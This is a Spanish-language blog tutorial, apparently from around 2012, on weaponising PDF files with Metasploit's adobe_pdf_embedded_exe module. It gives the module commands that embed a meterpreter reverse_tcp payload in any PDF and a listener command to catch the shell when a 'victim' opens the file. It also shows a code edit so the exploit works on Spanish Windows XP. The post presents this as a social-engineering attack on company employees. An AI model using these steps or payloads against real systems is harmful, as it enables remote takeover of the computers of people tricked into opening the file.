como envenenar un pdf



para mirar unas de las amenazas mas frecuentes en una empresa, debemos pensar en las vulnerabilidades a las que se pueden enfrentar los empleados, si el software de nuestra empresa no esta correctamente actualizado, general mente las empresas solo actualizan los parches de seguridad de los sistemas operativos y no tienen, encuenta que el sistema operativo tienen mucho mas software que necesita ser actualizado, con sus respectivas actualizaciones de seguridad. hoy les mostrare como con un poco de ingeniería social podremos obtener una shell reversa o un vnc. utilizando como herramienta nuestro querido Metasploit, utilizando el exploit “adobe_pdf_empedded_exe” con lo cual envenenaremos un pdf tan comun en las empresas como en nuestros hogares anterior mente era mucho mas seguro el pdf que un archivo de word pero hoy en dia es todo lo contrario lo mas inseguro que existe es pdf.

Lo bueno de el modulo “adobe_pdf_embedded_exe”, es que nos permitirá embeber el payload en cualquier PDF existente, algo útil es buscar un pdf en google

podemos hacer clic sobre las imágenes para verlas mejor 🙂



Otra aspecto a tener en cuenta, es que este modulo tiene rank de Execellent, por lo que es excelente opción, ante los demás exploits client side attacks que son menos estables.

Después de tener un pdf     lo que debemos realizar  es abrir metasploit  y aremos lo siguiente

use windows/fileformat/adobe_pdf_embedded_exe
set INFILENAME /tmp/nuestropdf.pdf
set FILENAME nuevonombre.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST nuestraip
exploit
en la primera opción INFILENAME colocamos la ruta de nuestro pdf a utilizar, y en la opciòn FILENAME
colocamos  el nombre al pdf resultante, en LHOST colocamos nuestra IP

luego dejamos escuchando  por la conexiòn reversa que se va a  generar una vez que la victima abra el pdf:

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=nuestraIP E

Luego cuando la víctima  abra el PDF, le aparecerá lo siguiente

bueno al momento de presionar “OPEN” el payload serà dropeado en el sistema, y un script  intentara abrirlo. como el exploit esta realisado  para windows xp SP3 English,  lo que haremos entonces es modificar el warning que el payload es buscado dentro de “Desktop”,”My Documents” .

para que funcione  con xp en español, debemos modificar el código  del mòdulo, los directorios ” Escritorio” y “Mis Documentos”, y realizamos de nuevo todo el procedimiento sobre el pdf:

esta es la ruta en backtrack

/framework3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb

y modificamos  las siguiente linea.

dirs = [ "Desktop", "My Documents", "Documents" ]
por
dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos" ]


Si se ejecutará el playload, obtendremos  un Meterpreter
y como podemos ver obtenemos una shellreversa con Meterpreter
mas información
http://www.kungfoosion.com/search/label/MetaSploit
 Este documento esta bajo licencia GPL
  1. octubre 19, 2012 en 2:27 pm

    Buen Post
    Me gustó la manera en que abarca sobre el tema.

    Continuaré visitando esta web

  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: